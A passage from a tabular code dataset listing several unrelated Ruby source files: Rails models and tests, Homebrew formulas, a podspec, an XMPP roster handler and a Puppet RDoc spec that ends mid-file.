hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
01c4893bc27d83db9a501c6370844ad63958e6b0 | 4,305 | # Copyright © 2011-2020 MUSC Foundation for Research Development~
# All rights reserved.~
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:~
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.~
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following~
# disclaimer in the documentation and/or other materials provided with the distribution.~
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products~
# derived from this software without specific prior written permission.~
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,~
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT~
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL~
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS~
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR~
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.~
class Appointment < ApplicationRecord
VISIT_TYPES = ['Lab Only', 'Space Only', 'PFT Only'].freeze
STATUSES = ['Skipped Visit', 'Visit happened elsewhere', 'Patient missed visit', 'No show', 'Visit happened outside of window'].freeze
NOTABLE_REASONS = ['Assessment not performed', 'SAE/Follow-up for SAE', 'Patient Visit Conflict', 'Study Visit Assessments Inconclusive', 'Other'].freeze
default_scope {order(:position)}
has_paper_trail
acts_as_paranoid
acts_as_list scope: [:arm_id, :protocols_participant_id]
include CustomPositioning #custom methods around positioning, acts_as_list
belongs_to :arm, -> { with_deleted }
belongs_to :protocols_participant
belongs_to :visit_group
has_one :protocol, through: :arm
has_many :appointment_statuses, dependent: :destroy
has_many :procedures, dependent: :destroy
has_many :notes, as: :notable
scope :completed, -> { where('completed_date IS NOT NULL') }
scope :incompleted, -> { where('appointments.completed_date IS NULL') }
scope :unstarted, -> { where('appointments.start_date IS NULL AND appointments.completed_date IS NULL') }
scope :with_completed_procedures, -> { joins(:procedures).where("procedures.completed_date IS NOT NULL") }
validates :name, presence: true
validates :arm_id, presence: true
validates :protocols_participant_id, presence: true
accepts_nested_attributes_for :notes
def cores
Organization.where(id: self.procedures.pluck(:sparc_core_id))
end
# Can appointment be finished? It must have a start date, and
# all its procedures must either be complete, incomplete, or
# have a follow up date assigned to it.
def started?
start_date.present?
end
def completed?
self.completed_date.present?
end
def can_finish?
!start_date.blank? && (procedures.all? { |proc| !proc.unstarted? })
end
def has_completed_procedures?
procedures.any?(&:completed_date)
end
def has_invoiced_procedures?
procedures.any?(&:invoiced?)
end
def has_credited_procedures?
procedures.any?(&:credited?)
end
def performable_by
# List of clinical providers that can perform actions on an the appointment's procedures
self.protocol.organization.clinical_provider_identities.order(:first_name, :last_name)
end
def procedures_grouped_by_core
procedures.group_by(&:sparc_core_id)
end
def set_completed_date
self.completed_date = Time.now
end
def destroy
if can_be_destroyed?
super
else
raise ActiveRecord::ActiveRecordError
end
end
def can_be_destroyed?
procedures.touched.empty?
end
def formatted_name
self.type == 'CustomAppointment' ? "#{self.name} (Custom Visit)" : self.visit_group.identifier
end
end
| 37.112069 | 155 | 0.757724 |
1c7a94fbb5358fbd7d29359da9a0d5492cee6809 | 260 | # frozen_string_literal: true
class RunConsistencyChecksJob < ApplicationJob
queue_as :default
def perform(*_args)
ConsistencyCheck.all.each do |consistency_check|
Dttp::CheckConsistencyJob.perform_later(consistency_check.id)
end
end
end
| 21.666667 | 67 | 0.780769 |
bb4de7dd548a96c5d795e8e4a07aa32221790888 | 962 | # Submitting Private Code
# 1. run for simulator
# 2. run for device
# 3. archive project
# 4. upload libMonyx.framework to github
# 5. create new release with version like in .podspec (for example 2.0.0)
# 6. run: pod repo push https://github.com/paveljo/Specs.git libMonyx.podspec
Pod::Spec.new do |s|
s.name = 'libMonyx'
s.version = '2.3.0'
s.summary = 'Monyx library'
s.homepage = 'https://github.com/paveljo/libMonyx'
s.author = { 'Name' => '[email protected]' }
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.platforms = { :ios => '10.0'}
s.source = { :git => 'https://github.com/paveljo/libMonyx.git', :tag => s.version.to_s}
s.pod_target_xcconfig = { 'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => 'arm64' }
s.user_target_xcconfig = { 'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => 'arm64' }
s.swift_version = '5.0'
s.ios.deployment_target = '10.0'
s.ios.vendored_frameworks = 'libMonyx.framework'
end | 35.62963 | 91 | 0.650728 |
ab6feb53fb6a85071d40566e362d40220af697d1 | 428 | require 'test_helper'
class Cms::Fortress::SettingsTest < ActiveSupport::TestCase
test "it_should_raise_MissingConfigFile_exception" do
assert_raises (Cms::Fortress::Error::MissingSettingsFile) {
Cms::Fortress::Settings.new(:bla)
}
end
test "test_it_should_return_the_config_file" do
settings = Cms::Fortress::Settings.new(:global_settings)
assert_equal(settings.title, 'CMS Fortress')
end
end
| 25.176471 | 63 | 0.752336 |
bb77f986329f512722d02e7d3aaa1291a28b6518 | 804 | #
# Cookbook Name:: attribute_settings
# Recipe:: default
#
# Copyright 2009, Opscode
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Chef::Recipe
include SyncLibrary
end
# Run the library code
go
$sync_library_global ||= 2
$sync_library_global -= 1
exit(2) if $sync_library_global == 0
| 25.935484 | 74 | 0.747512 |
eddd0b2fca6ec51ab8bdfd280df67a2d7c5ba8ca | 67 | require "maor/version"
module Maor
# Your code goes here...
end
| 11.166667 | 26 | 0.701493 |
e2c8eede18dfbbbb06c6fac59917bca18c408544 | 132 | require 'test_helper'
class EmailCertificationTest < ActiveSupport::TestCase
# test "the truth" do
# assert true
# end
end
| 16.5 | 54 | 0.727273 |
edc2e8c7b1d030ff5ceed26794fde268856c3088 | 264 | # frozen_string_literal: true
module GithubEventsExport
# Save each Event to disk
class Export
def initialize(client)
@client = client
end
def run
Event.all(client).each(&:save)
end
private
attr_reader :client
end
end
| 13.894737 | 36 | 0.659091 |
edecece72a18c283a45c95d1400eef5d5f254291 | 191 | require 'link_previewer/version'
require 'link_previewer/parser'
require 'link_previewer/previewer'
module LinkPreviewer
def self.init(url)
LinkPreviewer::Previewer.new(url)
end
end
| 19.1 | 37 | 0.795812 |
79334b1622453cf2ad2de16e1313ad65a9c7064e | 899 | module Services
module Hubspot
class HandleWebhook
def initialize(webhook:)
@webhook = webhook
end
def call
case @webhook['subscriptionType']
when 'contact.propertyChange'
return false unless webhook_valid?
handle_webhook
else
false
end
end
private
def webhook_valid?
if @webhook['propertyName'] != ENV['PROTECTED_FILE_LINK_PROPERTY'] ||
@webhook['propertyValue'].empty?
return false
end
true
end
def handle_webhook
file_url = Services::Hubspot::GetUploadedFileByUrl.new(url: @webhook['propertyValue']).call
contact = ::Hubspot::Contact.new('vid' => @webhook['objectId'], 'properties' => { sample: 'sample' })
contact.update!(ENV['PUBLIC_FILE_LINK_PROPERTY'] => file_url)
end
end
end
end
| 23.657895 | 109 | 0.596218 |
b90ff225b20217143824cb6673a9de32e72594b7 | 168 | require 'test_helper'
class StaticPagesControllerTest < ActionController::TestCase
test "should get index" do
get :index
assert_response :success
end
end
| 16.8 | 60 | 0.761905 |
e9c9a494f9f88f1695696f8ec5b344caf8b686d1 | 137 | class RemoveFechaInicioFromProyectos < ActiveRecord::Migration
def change
remove_column :proyectos, :fecha_inicio, :date
end
end
| 22.833333 | 62 | 0.79562 |
ff25e99955c877396f9767b18fe37b0e5736aa35 | 717 | require 'spec_helper'
require 'net/http'
describe Lab2::LiveStreamConnection do
it "requests an access token, connects to the live stream endpoint, and streams messages to stdout" do
credentials = Lab::Credentials.new
token_request = Lab2::TokenRequest.new(credentials.client_id, credentials.client_secret)
response = token_request.request
expect(response).to_not be_nil
expect(response).to be_a(Net::HTTPSuccess)
access_token = token_request.parse_response(response.body)
expect(access_token).to_not be_nil
expect(access_token).to be_a(String)
connection = Lab2::LiveStreamConnection.new(credentials.livestream_endpoint_url, access_token)
connection.open
end
end
| 27.576923 | 104 | 0.772664 |
7aef6e808c34448109d33fea7e5dcd69c9b1f18c | 2,234 | class Virtuoso < Formula
desc "High-performance object-relational SQL database"
homepage "https://virtuoso.openlinksw.com/wiki/main/"
url "https://github.com/openlink/virtuoso-opensource/releases/download/v7.2.6.1/virtuoso-opensource-7.2.6.tar.gz"
sha256 "38fd3c037aef62fcc7c28de5c0d6c2577d4bb19809e71421fc42093ed4d1c753"
license "GPL-2.0-only"
bottle do
sha256 cellar: :any, arm64_monterey: "80cff43493d2981f14ec84848d5951a239a1ffe307bc030e7fed2ebc48234303"
sha256 cellar: :any, arm64_big_sur: "07dd74a255eadcb7bf6cc41d3e07445a992069e5ab9072dc24a8f02fd98dcf74"
sha256 cellar: :any, monterey: "dfd970140bb4e7a212d2fa8c4be8a45a75d643fa247ed185d1fc6607ff044e76"
sha256 cellar: :any, big_sur: "d35c507e655a9b900986b609bb232f30c811cbfb4f3ec20d60d1146059ba5305"
sha256 cellar: :any, catalina: "bb672169382bf5faa77845765420adc91f5af1e46239e1f9d45d187b2f335570"
sha256 cellar: :any, mojave: "e19a2320912ff23b8f0a4926ee3c830d1bbbc9388fbe21634cbecf919e17f708"
sha256 cellar: :any_skip_relocation, x86_64_linux: "d396498868d1529455ff98c3432df539f5c0acecc2f807c7d5f49e1cf10d3267"
end
head do
url "https://github.com/openlink/virtuoso-opensource.git", branch: "develop/7"
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
end
# If gawk isn't found, make fails deep into the process.
depends_on "gawk" => :build
depends_on "[email protected]"
uses_from_macos "bison" => :build
uses_from_macos "flex" => :build
uses_from_macos "gperf" => :build
on_linux do
depends_on "net-tools" => :build
end
conflicts_with "unixodbc", because: "both install `isql` binaries"
skip_clean :la
def install
system "./autogen.sh" if build.head?
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
def caveats
<<~EOS
NOTE: the Virtuoso server will start up several times on port 1111
during the install process.
EOS
end
test do
system bin/"virtuoso-t", "+checkpoint-only"
end
end
| 37.233333 | 123 | 0.703223 |
87ad5deeb71c8b9f6e8b182adbd0f241543dd392 | 179 | require 'gettext_i18n_rails'
require 'gettext_i18n_rails_js/engine'
require 'gettext_i18n_rails_js/js_and_coffee_parser' if RUBY_PLATFORM != 'java'
module GettextI18nRailsJs
end
| 25.571429 | 79 | 0.854749 |
3925ec72547ef6f208fcd4e7dcdc576a71b6efac | 2,172 | require 'test_helper'
class PasswordResetsTest < ActionDispatch::IntegrationTest
def setup
ActionMailer::Base.deliveries.clear
@user = users(:michael)
end
test "password resets" do
get new_password_reset_path
assert_template 'password_resets/new'
# アドレス無効
post password_resets_path, params: { password_reset: {email: "" }}
assert_not flash.empty?
assert_template 'password_resets/new'
# アドレス有効
post password_resets_path,
params: { password_reset: { email: @user.email }}
assert_equal 1, ActionMailer::Base.deliveries.size
assert_not flash.empty?
assert_redirected_to root_url
# 再設定フォームのテスト
user = assigns(:user)
# アドレス無効
get edit_password_reset_path(user.reset_token, email: "")
assert_redirected_to root_url
# 無効なユーザー
user.toggle!(:activated)
get edit_password_reset_path(user.reset_token, email: user.email)
assert_redirected_to root_url
user.toggle!(:activated)
# アドレス有効、トークン無効
get edit_password_reset_path("wrong token", email: user.email)
assert_redirected_to root_url
# アドレスもトークンも有効
get edit_password_reset_path(user.reset_token, email: user.email)
assert_template 'password_resets/edit'
assert_select "input[name=email][type=hidden][value=?]", user.email
# 無効パスワードとパスワード確認
patch password_reset_path(user.reset_token),
params: { email: user.email,
user: { password: "foobaz",
password_confirmation: "barquux"}}
assert_select 'div#error_explanation'
# パスワードが空
patch password_reset_path(user.reset_token),
params: { email: user.email,
user: { password: "",
password_confirmation: ""}}
assert_select 'div#error_explanation'
# 有効なパスワードとパスワード確認
patch password_reset_path(user.reset_token),
params: { email: user.email,
user: { password: "foobaz",
password_confirmation: "foobaz"}}
assert is_logged_in?
assert_not flash.empty?
assert_redirected_to user
end
end
| 35.032258 | 72 | 0.655157 |
26ef4605fff31b9c7fe8d0c12dc0d1835663c86d | 8,275 | require 'spec_helper'
describe EmailValidator do
person_class = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => true
end
person_class_mx = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => {:mx => true}
end
person_class_mx_with_fallback = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => {:mx_with_fallback => true}
end
person_class_disposable_email = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => {:ban_disposable_email => true}
end
person_class_nil_allowed = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => {:allow_nil => true}
end
person_class_blank_allowed = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => {:allow_blank => true}
end
person_class_mx_separated = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :mx => true
end
person_class_mx_with_fallback_separated = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :mx_with_fallback => true
end
person_class_domain = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :domain => true
end
person_message_specified = Class.new do
include ActiveModel::Validations
attr_accessor :email
validates :email, :email => { :message => 'custom message', :ban_disposable_email => true }
end
shared_examples_for "Invalid model" do
before { subject.valid? }
it { is_expected.not_to be_valid }
specify { expect(subject.errors[:email]).to match_array errors }
end
shared_examples_for "Validating emails" do
before :each do
I18n.locale = locale
end
describe "validating email" do
subject { person_class.new }
it "fails when email empty" do
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when email is not valid" do
subject.email = 'joh@doe'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when email domain is prefixed with dot" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when email domain contains two consecutive dots" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when email is valid with information" do
subject.email = '"John Doe" <[email protected]>'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "passes when email is simple email address" do
subject.email = '[email protected]'
expect(subject.valid?).to be_truthy
expect(subject.errors[:email]).to be_empty
end
it "fails when email is simple email address not stripped" do
subject.email = '[email protected] '
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when domain contains a space" do
subject.email = 'john@doe .com'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when passing multiple simple email addresses" do
subject.email = '[email protected], [email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
end
describe "validating email with MX and fallback to A" do
subject { person_class_mx_with_fallback.new }
it "passes when email domain has MX record" do
subject.email = '[email protected]'
expect(subject.valid?).to be_truthy
expect(subject.errors[:email]).to be_empty
end
it "passes when email domain has no MX record but has an A record" do
subject.email = '[email protected]'
expect(subject.valid?).to be_truthy
expect(subject.errors[:email]).to be_empty
end
it "fails when domain does not exists" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
end
describe "validating email with MX" do
subject { person_class_mx.new }
it "passes when email domain has MX record" do
subject.email = '[email protected]'
expect(subject.valid?).to be_truthy
expect(subject.errors[:email]).to be_empty
end
it "fails when email domain has no MX record" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "fails when domain does not exists" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
end
describe "validating MX with fallback to A" do
subject { person_class_mx_with_fallback_separated.new }
context "when domain is not specified" do
before { subject.email = 'john' }
it_behaves_like "Invalid model"
end
context "when domain is not specified but @ is" do
before { subject.email = 'john@' }
it_behaves_like "Invalid model"
end
end
describe "validating MX" do
subject { person_class_mx_separated.new }
context "when domain is not specified" do
before { subject.email = 'john' }
it_behaves_like "Invalid model"
end
context "when domain is not specified but @ is" do
before { subject.email = 'john@' }
it_behaves_like "Invalid model"
end
end
describe "validating email from disposable service" do
subject { person_class_disposable_email.new }
it "passes when email from trusted email services" do
subject.email = '[email protected]'
expect(subject.valid?).to be_truthy
expect(subject.errors[:email]).to be_empty
end
it "fails when email from disposable email services" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
end
describe "validating domain" do
subject { person_class_domain.new }
it "does not pass with an invalid domain" do
subject.email = "[email protected]$\'"
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to eq errors
end
it "passes with valid domain" do
subject.email = '[email protected]'
expect(subject.valid?).to be_truthy
expect(subject.errors[:email]).to be_empty
end
end
end
describe "Can allow nil" do
subject { person_class_nil_allowed.new }
it "passes even if mail isn't set" do
subject.email = nil
expect(subject).to be_valid
expect(subject.errors[:email]).to be_empty
end
end
describe "Can allow blank" do
subject { person_class_blank_allowed.new }
it "passes even if mail is a blank string set" do
subject.email = ''
expect(subject).to be_valid
expect(subject.errors[:email]).to be_empty
end
end
describe "Accepts custom messages" do
subject { person_message_specified.new }
it "adds only the custom error" do
subject.email = '[email protected]'
expect(subject.valid?).to be_falsey
expect(subject.errors[:email]).to match_array [ 'custom message' ]
end
end
describe "Translating in english" do
let!(:locale){ :en }
let!(:errors) { [ "is invalid" ] }
it_behaves_like "Validating emails"
end
describe "Translating in french" do
let!(:locale){ :fr }
let!(:errors) { [ "est invalide" ] }
it_behaves_like "Validating emails"
end
end
| 29.343972 | 95 | 0.658489 |
21eae66299199933c1a8afa25973b558b005f2a4 | 5,160 | # encoding: UTF-8
module Vines
class Stanza
class Iq
class Roster < Query
NS = NAMESPACES[:roster]
register "/iq[@id and (@type='get' or @type='set')]/ns:query", 'ns' => NS
def process
validate_to_address
get? ? roster_query : update_roster
end
private
# Send an iq result stanza containing roster items to the user in
# response to their roster get request. Requesting the roster makes
# this stream an "interested resource" that can now receive roster
# updates.
def roster_query
stream.requested_roster!
stream.write(stream.user.to_roster_xml(self['id']))
end
# Roster sets must have no 'to' address or be addressed to the same
# JID that sent the stanza. RFC 6121 sections 2.1.5 and 2.3.3.
def validate_to_address
to = validate_to
unless to.nil? || to.bare == stream.user.jid.bare
raise StanzaErrors::Forbidden.new(self, 'auth')
end
end
# Add, update, or delete the roster item contained in the iq set
# stanza received from the client. RFC 6121 sections 2.3, 2.4, 2.5.
def update_roster
items = self.xpath('ns:query/ns:item', 'ns' => NS)
raise StanzaErrors::BadRequest.new(self, 'modify') if items.size != 1
item = items.first
jid = JID.new(item['jid']) rescue (raise StanzaErrors::JidMalformed.new(self, 'modify'))
raise StanzaErrors::BadRequest.new(self, 'modify') if jid.empty? || !jid.bare?
if item['subscription'] == 'remove'
remove_contact(jid)
return
end
raise StanzaErrors::NotAllowed.new(self, 'modify') if jid == stream.user.jid.bare
groups = item.xpath('ns:group', 'ns' => NS).map {|g| g.text.strip }
raise StanzaErrors::BadRequest.new(self, 'modify') if groups.uniq!
raise StanzaErrors::NotAcceptable.new(self, 'modify') if groups.include?('')
contact = stream.user.contact(jid)
unless contact
contact = Contact.new(jid: jid)
stream.user.roster << contact
end
contact.name = item['name']
contact.groups = groups
storage.save_user(stream.user)
stream.update_user_streams(stream.user)
send_result_iq
push_roster_updates(stream.user.jid, contact)
end
# Remove the contact with this JID from the user's roster and send
# roster pushes to the user's interested resources. This is triggered
# by receiving an iq set with an item element like
# <item jid="[email protected]" subscription="remove"/>. RFC 6121
# section 2.5.
def remove_contact(jid)
contact = stream.user.contact(jid)
raise StanzaErrors::ItemNotFound.new(self, 'modify') unless contact
if local_jid?(contact.jid)
user = storage(contact.jid.domain).find_user(contact.jid)
end
if user && user.contact(stream.user.jid)
user.contact(stream.user.jid).subscription = 'none'
user.contact(stream.user.jid).ask = nil
end
stream.user.remove_contact(contact.jid)
[user, stream.user].compact.each do |save|
storage(save.jid.domain).save_user(save)
stream.update_user_streams(save)
end
send_result_iq
push_roster_updates(stream.user.jid,
Contact.new(jid: contact.jid, subscription: 'remove'))
if local_jid?(contact.jid)
send_unavailable(stream.user.jid, contact.jid) if contact.subscribed_from?
send_unsubscribe(contact)
if user && user.contact(stream.user.jid)
push_roster_updates(contact.jid, user.contact(stream.user.jid))
end
else
send_unsubscribe(contact)
end
end
# Notify the contact that it's been removed from the user's roster
# and no longer has any presence relationship with the user.
def send_unsubscribe(contact)
presence = [%w[to unsubscribe], %w[from unsubscribed]].map do |meth, type|
presence(contact.jid, type) if contact.send("subscribed_#{meth}?")
end.compact
broadcast_to_interested_resources(presence, contact.jid)
end
def presence(to, type)
doc = Document.new
doc.create_element('presence',
'from' => stream.user.jid.bare.to_s,
'id' => Kit.uuid,
'to' => to.to_s,
'type' => type)
end
# Send an iq set stanza to the user's interested resources, letting them
# know their roster has been updated.
def push_roster_updates(to, contact)
stream.interested_resources(to).each do |recipient|
contact.send_roster_push(recipient)
end
end
def send_result_iq
node = to_result
node.remove_attribute('from')
stream.write(node)
end
end
end
end
end
| 36.595745 | 98 | 0.597287 |
b92f743dccc3a1ecbff442db39ee96d3861cd810 | 146 | require "test_helper"
class CalendlyrTest < Minitest::Test
def test_that_it_has_a_version_number
refute_nil ::Calendlyr::VERSION
end
end
| 18.25 | 39 | 0.794521 |
619ad4cff55cef2d2145b74acce816d42b015d2d | 2,243 | require 'spec_helper'
require 'support/test_model'
describe ActiveRecordExtensions::CreateExtensions do
describe '.update_or_create' do
context 'when no records exists previously' do
subject do
TestModel.update_or_create({day: Date.today}, {foo: :bar})
end
it { should be_an_instance_of TestModel }
it 'should have one record of type TestModel' do
expect(subject.class.count).to eq 1
end
it 'should update the value of foo' do
expect(subject.class.find_by_day(Date.today).foo).to eq "bar"
end
end
context 'when a record already exists' do
before do
TestModel.update_or_create({day: Date.today}, {foo: :bar})
end
subject do
TestModel.update_or_create({day: Date.today}, {foo: :newbar})
end
it { should be_an_instance_of TestModel }
it 'should have one record of type TestModel' do
expect(subject.class.count).to eq 1
end
it 'should update the value of foo to the new value' do
expect(subject.class.find_by_day(Date.today).foo).to eq "newbar"
end
end
end
describe '.delete_then_create' do
context 'when previous records exists' do
let(:matched_attributes) { { day: Date.today } }
let(:updated_record_foo) { 'baz' }
before do
TestModel.update_or_create(matched_attributes, {foo: 'bar'})
TestModel.update_or_create(matched_attributes, {foo: updated_record_foo})
end
it 'should have not added new records' do
expect(TestModel.count).to eq 1
end
it 'should have updated the record' do
expect(TestModel.first.foo).to eq updated_record_foo
end
end
context 'when previous records does not exists' do
let(:day) { Date.today }
let(:foo) { 'bar' }
before do
TestModel.update_or_create({ day: day }, {foo: foo})
end
it 'should have added one new record' do
expect(TestModel.count).to eq 1
end
it 'should have set the day of record' do
expect(TestModel.first.day).to eq day
end
it 'should have set the foo of record' do
expect(TestModel.first.foo).to eq foo
end
end
end
end
| 26.388235 | 81 | 0.641106 |
e86319c8c6a7e7559e8a486439fb8231e9611f72 | 1,299 | class OpenBabel < Formula
desc "Chemical toolbox"
homepage "https://openbabel.org"
url "https://github.com/openbabel/openbabel/archive/openbabel-3-1-1.tar.gz"
version "3.1.1"
sha256 "c97023ac6300d26176c97d4ef39957f06e68848d64f1a04b0b284ccff2744f02"
license "GPL-2.0"
revision 1
head "https://github.com/openbabel/openbabel.git"
bottle do
sha256 "770cdafc4dfdd0c216ca9308d5b5ae6b9b00be8d30b387dd2e86cbff82db5acd" => :catalina
sha256 "6c44b3e574a786396b8099192e5154f1d751ee413ec265c99f8046fc5167876a" => :mojave
sha256 "49d5dc2fc8c9a857bf08e6e6711fbaf48d8a0165c328cc400e904aa5a37080a4" => :high_sierra
sha256 "c460add629080d7c4122a84d525ba9f75e6afe4c215ee160fc0840038c190dd7" => :x86_64_linux
end
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "rapidjson" => :build
depends_on "swig" => :build
depends_on "cairo"
depends_on "eigen"
depends_on "[email protected]"
def install
args = std_cmake_args + %W[
-DRUN_SWIG=ON
-DPYTHON_BINDINGS=ON
-DPYTHON_EXECUTABLE=#{Formula["[email protected]"].opt_bin}/python3
]
mkdir "build" do
system "cmake", "..", *args
system "make"
system "make", "install"
end
end
test do
system "#{bin}/obabel", "-:'C1=CC=CC=C1Br'", "-omol"
end
end
| 29.522727 | 94 | 0.718245 |
e224766ac9b73ceb5aa94316b84e06263c742fb3 | 5,431 | #! /usr/bin/env ruby -S rspec
require 'spec_helper'
require 'puppet/util/rdoc'
require 'rdoc/rdoc'
describe Puppet::Util::RDoc do
it "should fail with a clear error without RDoc 1.*" do
Puppet.features.stubs(:rdoc1?).returns(false)
expect { Puppet::Util::RDoc.rdoc("output", []) }.
should raise_error(/the version of RDoc .* is not supported/)
end
describe "when generating RDoc HTML documentation", :if => Puppet.features.rdoc1? do
before :each do
@rdoc = stub_everything 'rdoc'
RDoc::RDoc.stubs(:new).returns(@rdoc)
end
it "should tell the parser to ignore import" do
Puppet.expects(:[]=).with(:ignoreimport, true)
Puppet::Util::RDoc.rdoc("output", [])
end
it "should install the Puppet HTML Generator into RDoc generators" do
Puppet::Util::RDoc.rdoc("output", [])
RDoc::RDoc::GENERATORS["puppet"].file_name.should == "puppet/util/rdoc/generators/puppet_generator.rb"
end
it "should tell RDoc to generate documentation using the Puppet generator" do
@rdoc.expects(:document).with { |args| args.include?("--fmt") and args.include?("puppet") }
Puppet::Util::RDoc.rdoc("output", [])
end
it "should tell RDoc to be quiet" do
@rdoc.expects(:document).with { |args| args.include?("--quiet") }
Puppet::Util::RDoc.rdoc("output", [])
end
it "should pass charset to RDoc" do
@rdoc.expects(:document).with { |args| args.include?("--charset") and args.include?("utf-8") }
Puppet::Util::RDoc.rdoc("output", [], "utf-8")
end
it "should tell RDoc to force updates of indices when RDoc supports it" do
Options::OptionList.stubs(:options).returns([["--force-update", "-U", 0 ]])
@rdoc.expects(:document).with { |args| args.include?("--force-update") }
Puppet::Util::RDoc.rdoc("output", [])
end
it "should not tell RDoc to force updates of indices when RDoc doesn't support it" do
Options::OptionList.stubs(:options).returns([])
@rdoc.expects(:document).never.with { |args| args.include?("--force-update") }
Puppet::Util::RDoc.rdoc("output", [])
end
it "should tell RDoc to use the given outputdir" do
@rdoc.expects(:document).with { |args| args.include?("--op") and args.include?("myoutputdir") }
Puppet::Util::RDoc.rdoc("myoutputdir", [])
end
it "should tell RDoc to exclude .pp files under any modules/<mod>/files section" do
@rdoc.expects(:document).with { |args| args.include?("--exclude") and args.include?("/modules/[^/]*/files/.*\.pp$") }
Puppet::Util::RDoc.rdoc("myoutputdir", [])
end
it "should give all the source directories to RDoc" do
@rdoc.expects(:document).with { |args| args.include?("sourcedir") }
Puppet::Util::RDoc.rdoc("output", ["sourcedir"])
end
end
describe "when running a manifest documentation" do
it "should tell the parser to ignore import" do
Puppet.expects(:[]=).with(:ignoreimport, true)
Puppet::Util::RDoc.manifestdoc([])
end
it "should use a parser with the correct environment" do
FileTest.stubs(:file?).returns(true)
Puppet::Util::RDoc.stubs(:output)
parser = stub_everything
Puppet::Parser::Parser.stubs(:new).with{ |env| env.is_a?(Puppet::Node::Environment) }.returns(parser)
parser.expects(:file=).with("file")
parser.expects(:parse)
Puppet::Util::RDoc.manifestdoc(["file"])
end
it "should puppet parse all given files" do
FileTest.stubs(:file?).returns(true)
Puppet::Util::RDoc.stubs(:output)
parser = stub_everything
Puppet::Parser::Parser.stubs(:new).returns(parser)
parser.expects(:file=).with("file")
parser.expects(:parse)
Puppet::Util::RDoc.manifestdoc(["file"])
end
it "should call output for each parsed file" do
FileTest.stubs(:file?).returns(true)
ast = stub_everything
parser = stub_everything
Puppet::Parser::Parser.stubs(:new).returns(parser)
parser.stubs(:parse).returns(ast)
Puppet::Util::RDoc.expects(:output).with("file", ast)
Puppet::Util::RDoc.manifestdoc(["file"])
end
describe "when outputing documentation" do
it "should output doc for ast classes, nodes and definitions in order of increasing line number" do
byline = sequence('documentation outputs in line order')
Puppet::Util::RDoc.expects(:puts).with("im a class\n").in_sequence(byline)
Puppet::Util::RDoc.expects(:puts).with("im a node\n").in_sequence(byline)
Puppet::Util::RDoc.expects(:puts).with("im a define\n").in_sequence(byline)
# any other output must fail
Puppet::Util::RDoc.manifestdoc([my_fixture('basic.pp')])
end
it "should output resource documentation if needed" do
pending "#6634 being fixed"
Puppet.settings[:document_all] = true
byline = sequence('documentation outputs in line order')
Puppet::Util::RDoc.expects(:puts).with("im a class\n").in_sequence(byline)
Puppet::Util::RDoc.expects(:puts).with("im a node\n").in_sequence(byline)
